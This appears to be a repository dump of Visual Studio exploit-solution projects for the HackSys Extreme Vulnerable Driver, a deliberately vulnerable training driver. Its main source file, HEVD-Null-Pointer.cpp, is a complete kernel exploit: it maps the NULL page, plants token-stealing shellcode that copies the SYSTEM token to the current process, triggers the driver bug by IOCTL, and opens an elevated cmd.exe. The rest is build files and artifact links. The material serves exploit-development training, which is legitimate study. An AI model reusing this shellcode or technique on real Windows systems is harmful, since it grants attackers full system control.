 2 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\vc141.pdb
 3 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\vc141.idb
 4 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-null-pointer.pch.codeanalysisast
 5 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\stdafx.nativecodeanalysis.xml
 6 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\stdafx.obj
 7 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-null-pointer.pch
 8 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-null-pointer.obj
 9 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-null-pointer.obj.enc
10 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\debug\hevd-null-pointer.pdb
11 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-nul.7a87b03e.tlog\cl.command.1.tlog
12 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-nul.7a87b03e.tlog\cl.read.1.tlog
13 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-nul.7a87b03e.tlog\cl.write.1.tlog
14 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-nul.7a87b03e.tlog\link.2944-cvtres.read.1.tlog
15 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-nul.7a87b03e.tlog\link.2944-cvtres.write.1.tlog
16 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-nul.7a87b03e.tlog\link.2944-rc.read.1.tlog
17 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-nul.7a87b03e.tlog\link.2944-rc.write.1.tlog
18 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-nul.7a87b03e.tlog\link.2944.read.1.tlog
19 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-nul.7a87b03e.tlog\link.2944.write.1.tlog
20 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-nul.7a87b03e.tlog\link.command.1.tlog
21 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-nul.7a87b03e.tlog\link.read.1.tlog
22 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\debug\hevd-nul.7a87b03e.tlog\link.write.1.tlog
23 | 


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Null-Pointer.log:
--------------------------------------------------------------------------------
1 |   HEVD-Null-Pointer.cpp
2 | c:\users\gwilcox\documents\visual studio 2017\projects\hevd-null-pointer\hevd-null-pointer\hevd-null-pointer.cpp(90): warning C4477: 'printf' : format string '%08x' requires an argument of type 'unsigned int', but variadic argument 1 has type 'LPVOID'
3 |   HEVD-Null-Pointer.vcxproj -> C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\HEVD-Null-Pointer\Debug\HEVD-Null-Pointer.exe
4 |   HEVD-Null-Pointer.vcxproj -> C:\Users\gwilcox\Documents\Visual Studio 2017\Projects\HEVD-Null-Pointer\Debug\HEVD-Null-Pointer.pdb (Partial PDB)
5 | 


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Null-Pointer.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Null-Pointer.obj


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Null-Pointer.pch:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/HEVD-Null-Pointer.pch


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/hevd-null-pointer.obj.enc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/hevd-null-pointer.obj.enc


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/stdafx.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/stdafx.obj


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/vc141.idb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/vc141.idb


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/vc141.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Null-Pointer/HEVD-Null-Pointer/Debug/vc141.pdb


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/HEVD-Null-Pointer.cpp:
--------------------------------------------------------------------------------
  1 | #include "stdafx.h"
  2 | #include "windows.h"
  3 | #include "Winternl.h"
  4 | #include "stdio.h"
  5 | #pragma comment(lib,"ntdll.lib")
  6 | 
  7 | /*
  8 | 	As there is no header file which defines NtAllocateVirtualMemory we will define our own copy of the function,
  9 | 	which we will name _NtAllocateVirtualMemory, given what we know. This is all because the function is technically
 10 | 	undefined and not exported to the public so we need to tell the compiler what the function should be expecting as input
 11 | 	and what it will return.
 12 | 
 13 | 	NTSTATUS as this is what the function returns (technically defined at __success(return >= 0) ). 
 14 | 	WINAPI as this is the calling convention (it is a macro that evaluates to __stdcall aka stdcall, the standard calling convention) (https://stackoverflow.com/questions/3378622/how-to-understand-the-ntstatus-nt-success-typedef-in-windows-ddk)
 15 | 
 16 | 	We need to define this as such (with (WINAPI *_NtAllocateVirtualMemory) ) as to distingush the fact that we are declaring a function pointer, rather than
 17 | 	a function returning a pointer, we need to wrap it in parenthesis as such:
 18 | 	
 19 | 	(WINAPI *_NtAllocateVirtualMemory)
 20 | 	
 21 | 	See https://stackoverflow.com/questions/34968342/cannot-understand-this-c-typedef for a better explaination on this than I can type.
 22 | 	*/
 23 | typedef NTSTATUS(WINAPI *_NtAllocateVirtualMemory)(
 24 | 	HANDLE ProcessHandle, 
 25 | 	PVOID *BaseAddress, 
 26 | 	ULONG_PTR ZeroBits, 
 27 | 	PSIZE_T AllocationSize, 
 28 | 	ULONG AllocationType, 
 29 | 	ULONG Protect
 30 | );
 31 | 
 32 | int main()
 33 | {
 34 | 	printf("Triggering NULL pointer dereference\r\n");
 35 | 	printf("Opening handle to device \\\\\\\\.\\\\HackSysExtremeVulnerableDriver...\r\n");
 36 | 	HANDLE deviceHandle = CreateFileA("\\\\.\\HackSysExtremeVulnerableDriver", FILE_READ_ACCESS | FILE_WRITE_ACCESS, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, FILE_FLAG_OVERLAPPED | FILE_ATTRIBUTE_NORMAL, NULL);
 37 | 	if (deviceHandle == INVALID_HANDLE_VALUE) {
 38 | 		printf("Failed to open handle to device driver. :( \r\n");
 39 | 		return 1;
 40 | 	}
 41 | 	printf("\r\nSending fake user input of 0xFAD1FAD1 so we bypass the check for normal\r\noperations (which occurs when we send 0xBAD0B0B0) and instead\r\nuse a null pointer as the location of a callback address\r\n\r\n");
 42 | 	char inBuffer[20] = "\xD1\xFA\xD1\xFA";
 43 | 	DWORD outBytes = 0;
 44 | 	
 45 | 	int baseAddress = 0x1; // This will be rounded down to 0. If we just entered 0, it would be the same as specifying NULL, so the function would likely just quit, and say our input is wrong.
 46 | 	int allocationSize = 2048; // A nice number, we can probably allocate less memory though, but this works okay.
 47 | 	int result = 333; // Lets set this to 333 so when NtAllocateVirtualMemory returns successfully, we can see this get set to 0, or alteratively to something like 0xC0000005 if there was an error.
 48 | 	
 49 | 	printf("Getting address of NtAllocateVirtualMemory from ntdll.dll\r\n");
 50 | 	/*
 51 | 		We don't know where in memory NtAllocateVirtualMemory is stored prior to this so we use GetModuleHandleW to first get the address where ntdll.dll is located in memory.
 52 | 		From this we can then use a HANDLE to this address to then get the address where NtAllocateVirtualMemory is located within the currently loaded ntdll.dll.
 53 | 	*/
 54 | 	_NtAllocateVirtualMemory NtAllocateVirtualMemory = (_NtAllocateVirtualMemory)GetProcAddress(GetModuleHandleW(L"ntdll.dll"), "NtAllocateVirtualMemory");
 55 | 	
 56 | 	/*
 57 | 		
 58 | 	*/
 59 | 	printf("Allocating NULL page using NtAllocateVirtualMemory\r\n");
 60 | 	result = NtAllocateVirtualMemory(GetCurrentProcess(), (PVOID *) &baseAddress, 0, (PSIZE_T) &allocationSize, 0x3000, 0x40);
 61 | 	if (result != 0) {
 62 | 		printf("Failed to allocate NULL page. :(\r\n");
 63 | 	}
 64 | 	else {
 65 | 		printf("Success! Allocated NULL page!\r\n");
 66 | 	}
 67 | 	printf("Mapping 0x00000004 to shellcode\r\n");
 68 | 	char shellcode[60] = (
 69 | 		"\x60" // PUSHAD
 70 | 		"\x64\xA1\x24\x01\x00\x00" // MOV EAX, fs:[KTHREAD_OFFSET]
 71 | 		"\x8B\x40\x50" // MOV EAX, [EAX + EPROCESS_OFFSET]
 72 | 		"\x89\xC1" // mov ecx, eax (Current EPROCESS structure)
 73 | 		"\x8B\x98\xF8\x00\x00\x00" // mov ebx, [eax + TOKEN_OFFSET]
 74 | 								   // #---[Copy System PID token]
 75 | 		"\xBA\x04\x00\x00\x00" // mov edx, 4 (SYSTEM PID)
 76 | 		"\x8B\x80\xB8\x00\x00\x00" // mov eax, [eax + FLINK_OFFSET] <-|
 77 | 		"\x2D\xB8\x00\x00\x00" //               sub eax, FLINK_OFFSET |
 78 | 		"\x39\x90\xB4\x00\x00\x00" //      cmp[eax + PID_OFFSET], edx |
 79 | 		"\x75\xED" // jnz                                          -> |
 80 | 		"\x8B\x90\xF8\x00\x00\x00" // mov edx, [eax + TOKEN_OFFSET]
 81 | 		"\x89\x91\xF8\x00\x00\x00" // mov[ecx + TOKEN_OFFSET], edx
 82 | 								   //#---[Recover]
 83 | 		"\x61" // popad
 84 | 		"\x31\xC0" // Set NTSTATUS->STATUS_SUCCESS so calling function thinks we exited successfully
 85 | 		"\xC3" // RET
 86 | 	);
 87 | 	printf("\r\nShellcode size: %i\r\n", sizeof(shellcode));
 88 | 	printf("Allocating rwx memory for shellcode using VirtualAlloc\r\n");
 89 | 	LPVOID shellcodeAddress = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
 90 | 	printf("Address of rwx memory: 0x%08x\r\n", shellcodeAddress);
 91 | 	printf("\r\nCopying shellcode in memory (which is not executable atm) to executable\r\nlocation we created with VirtualAlloc\r\n\r\n");
 92 | 	memcpy(shellcodeAddress, shellcode, sizeof(shellcode));
 93 | 	printf("Getting pointer to address of shellcode so memcpy will dereference\r\nthe pointer,get the address of our shellcode, and copy this address\r\nto 0x00000004.\r\n\r\n");
 94 | 	LPVOID theShellcodeAddress = &shellcodeAddress;
 95 | 
 96 | 	printf("Copying address of shellcode to 0x00000004 using memcpy\r\n");
 97 | 	void * returnResult = memcpy((LPVOID) 0x00000004, theShellcodeAddress, 4);
 98 | 	printf("\r\nDevice IOCTL: 0x22202B\r\n");
 99 | 	printf("InBuffer: 0x%2x%2x%2x%2x\r\n", inBuffer[3] & 0xff, inBuffer[2] & 0xff, inBuffer[1] & 0xff, inBuffer[0] & 0xff);
100 | 	printf("Size of InBuffer: %i", sizeof(inBuffer));
101 | 	printf("\r\nSending IOCTL message to driver...\r\n");
102 | 	DeviceIoControl(deviceHandle, 0x22202B, &inBuffer, sizeof(inBuffer), NULL, 0, &outBytes, (LPOVERLAPPED)NULL);
103 | 
104 | 	printf("\r\nOkay we should have stolen the token now. Creating cmd.exe with new permissions.");
105 | 	PROCESS_INFORMATION pi;
106 | 	ZeroMemory(&pi, sizeof(pi));
107 | 	STARTUPINFOA si;
108 | 	ZeroMemory(&si, sizeof(si));
109 | 	si.cb = sizeof(si);
110 | 	CreateProcessA("C:\\Windows\\System32\\cmd.exe", NULL, NULL, NULL, 0, CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi);
111 | 	printf("Annnnd presto :D\r\n");
112 | }
113 | 
114 | 


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/HEVD-Null-Pointer.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" ToolsVersion="15.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>15.0</VCProjectVersion>
 23 |     <ProjectGuid>{7A87B03E-2EDA-4F70-90D9-2C8E7B84A515}</ProjectGuid>
 24 |     <Keyword>Win32Proj</Keyword>
 25 |     <RootNamespace>HEVDNullPointer</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0.15063.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v141</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v141</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v141</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v141</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <LinkIncremental>true</LinkIncremental>
 75 |   </PropertyGroup>
 76 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 77 |     <LinkIncremental>true</LinkIncremental>
 78 |   </PropertyGroup>
 79 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 80 |     <LinkIncremental>false</LinkIncremental>
 81 |   </PropertyGroup>
 82 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 83 |     <LinkIncremental>false</LinkIncremental>
 84 |   </PropertyGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 86 |     <ClCompile>
 87 |       <PrecompiledHeader>Use</PrecompiledHeader>
 88 |       <WarningLevel>Level3</WarningLevel>
 89 |       <Optimization>Disabled</Optimization>
 90 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 91 |       <AdditionalIncludeDirectories>C:\Program Files\Windows Kits\10\Include\10.0.15063.0\km;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
 92 |     </ClCompile>
 93 |     <Link>
 94 |       <SubSystem>Console</SubSystem>
 95 |     </Link>
 96 |   </ItemDefinitionGroup>
 97 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 98 |     <ClCompile>
 99 |       <PrecompiledHeader>Use</PrecompiledHeader>
100 |       <WarningLevel>Level3</WarningLevel>
101 |       <Optimization>Disabled</Optimization>
102 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
103 |     </ClCompile>
104 |     <Link>
105 |       <SubSystem>Console</SubSystem>
106 |     </Link>
107 |   </ItemDefinitionGroup>
108 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
109 |     <ClCompile>
110 |       <WarningLevel>Level3</WarningLevel>
111 |       <PrecompiledHeader>Use</PrecompiledHeader>
112 |       <Optimization>MaxSpeed</Optimization>
113 |       <FunctionLevelLinking>true</FunctionLevelLinking>
114 |       <IntrinsicFunctions>true</IntrinsicFunctions>
115 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
116 |     </ClCompile>
117 |     <Link>
118 |       <SubSystem>Console</SubSystem>
119 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
120 |       <OptimizeReferences>true</OptimizeReferences>
121 |     </Link>
122 |   </ItemDefinitionGroup>
123 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
124 |     <ClCompile>
125 |       <WarningLevel>Level3</WarningLevel>
126 |       <PrecompiledHeader>Use</PrecompiledHeader>
127 |       <Optimization>MaxSpeed</Optimization>
128 |       <FunctionLevelLinking>true</FunctionLevelLinking>
129 |       <IntrinsicFunctions>true</IntrinsicFunctions>
130 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
131 |     </ClCompile>
132 |     <Link>
133 |       <SubSystem>Console</SubSystem>
134 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
135 |       <OptimizeReferences>true</OptimizeReferences>
136 |     </Link>
137 |   </ItemDefinitionGroup>
138 |   <ItemGroup>
139 |     <Text Include="ReadMe.txt" />
140 |   </ItemGroup>
141 |   <ItemGroup>
142 |     <ClInclude Include="stdafx.h" />
143 |     <ClInclude Include="targetver.h" />
144 |   </ItemGroup>
145 |   <ItemGroup>
146 |     <ClCompile Include="HEVD-Null-Pointer.cpp" />
147 |     <ClCompile Include="stdafx.cpp">
148 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
149 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
150 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
151 |       <PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
152 |     </ClCompile>
153 |   </ItemGroup>
154 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
155 |   <ImportGroup Label="ExtensionTargets">
156 |   </ImportGroup>
157 | </Project>


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/HEVD-Null-Pointer.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;hm;inl;inc;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <Text Include="ReadMe.txt" />
19 |   </ItemGroup>
20 |   <ItemGroup>
21 |     <ClInclude Include="stdafx.h">
22 |       <Filter>Header Files</Filter>
23 |     </ClInclude>
24 |     <ClInclude Include="targetver.h">
25 |       <Filter>Header Files</Filter>
26 |     </ClInclude>
27 |   </ItemGroup>
28 |   <ItemGroup>
29 |     <ClCompile Include="stdafx.cpp">
30 |       <Filter>Source Files</Filter>
31 |     </ClCompile>
32 |     <ClCompile Include="HEVD-Null-Pointer.cpp">
33 |       <Filter>Source Files</Filter>
34 |     </ClCompile>
35 |   </ItemGroup>
36 | </Project>


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/ReadMe.txt:
--------------------------------------------------------------------------------
 1 | ========================================================================
 2 |     CONSOLE APPLICATION : HEVD-Null-Pointer Project Overview
 3 | ========================================================================
 4 | 
 5 | AppWizard has created this HEVD-Null-Pointer application for you.
 6 | 
 7 | This file contains a summary of what you will find in each of the files that
 8 | make up your HEVD-Null-Pointer application.
 9 | 
10 | 
11 | HEVD-Null-Pointer.vcxproj
12 |     This is the main project file for VC++ projects generated using an Application Wizard.
13 |     It contains information about the version of Visual C++ that generated the file, and
14 |     information about the platforms, configurations, and project features selected with the
15 |     Application Wizard.
16 | 
17 | HEVD-Null-Pointer.vcxproj.filters
18 |     This is the filters file for VC++ projects generated using an Application Wizard. 
19 |     It contains information about the association between the files in your project 
20 |     and the filters. This association is used in the IDE to show grouping of files with
21 |     similar extensions under a specific node (for e.g. ".cpp" files are associated with the
22 |     "Source Files" filter).
23 | 
24 | HEVD-Null-Pointer.cpp
25 |     This is the main application source file.
26 | 
27 | /////////////////////////////////////////////////////////////////////////////
28 | Other standard files:
29 | 
30 | StdAfx.h, StdAfx.cpp
31 |     These files are used to build a precompiled header (PCH) file
32 |     named HEVD-Null-Pointer.pch and a precompiled types file named StdAfx.obj.
33 | 
34 | /////////////////////////////////////////////////////////////////////////////
35 | Other notes:
36 | 
37 | AppWizard uses "TODO:" comments to indicate parts of the source code you
38 | should add to or customize.
39 | 
40 | /////////////////////////////////////////////////////////////////////////////
41 | 


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/stdafx.cpp:
--------------------------------------------------------------------------------
1 | // stdafx.cpp : source file that includes just the standard includes
2 | // HEVD-Null-Pointer.pch will be the pre-compiled header
3 | // stdafx.obj will contain the pre-compiled type information
4 | 
5 | #include "stdafx.h"
6 | 
7 | // TODO: reference any additional headers you need in STDAFX.H
8 | // and not in this file
9 | 


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/stdafx.h:
--------------------------------------------------------------------------------
 1 | // stdafx.h : include file for standard system include files,
 2 | // or project specific include files that are used frequently, but
 3 | // are changed infrequently
 4 | //
 5 | 
 6 | #pragma once
 7 | 
 8 | #include "targetver.h"
 9 | 
10 | #include <stdio.h>
11 | #include <tchar.h>
12 | 
13 | 
14 | 
15 | // TODO: reference additional headers your program requires here
16 | 


--------------------------------------------------------------------------------
/HEVD-Null-Pointer/HEVD-Null-Pointer/targetver.h:
--------------------------------------------------------------------------------
1 | #pragma once
2 | 
3 | // Including SDKDDKVer.h defines the highest available Windows platform.
4 | 
5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and
6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h.
7 | 
8 | #include <SDKDDKVer.h>
9 | 


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/Debug/HEVD-Pool-Overflow.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/Debug/HEVD-Pool-Overflow.exe


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/Debug/HEVD-Pool-Overflow.ilk:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/Debug/HEVD-Pool-Overflow.ilk


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/Debug/HEVD-Pool-Overflow.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/tekwizz123/HEVD-Exploit-Solutions/65992fd3802fb8204fac3a96ead19279db78bdfc/HEVD-Pool-Overflow/Debug/HEVD-Pool-Overflow.pdb


--------------------------------------------------------------------------------
/HEVD-Pool-Overflow/HEVD-Pool-Overflow.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio 15
 4 | VisualStudioVersion = 15.0.26430.15
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HEVD-Pool-Overflow", "HEVD-Pool-Overflow\HEVD-Pool-Overflow.vcxproj", "{91D3A0DB-2B86-42CA-A28A-8FA1D883921D}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{91D3A0DB-2B86-42CA-A28A-8FA1D883921D}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{91D3A0DB-2B86-42CA-A28A-8FA1D883921D}.Debug|x64.Build.0 = Debug|x64
18 | 		{91D3A0DB-2B86-42CA-A28A-8FA1D883921D}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{91D3A0DB-2B86-42CA-A28A-8FA1D883921D}.Debug|x86.Build.0 = Debug|Win32
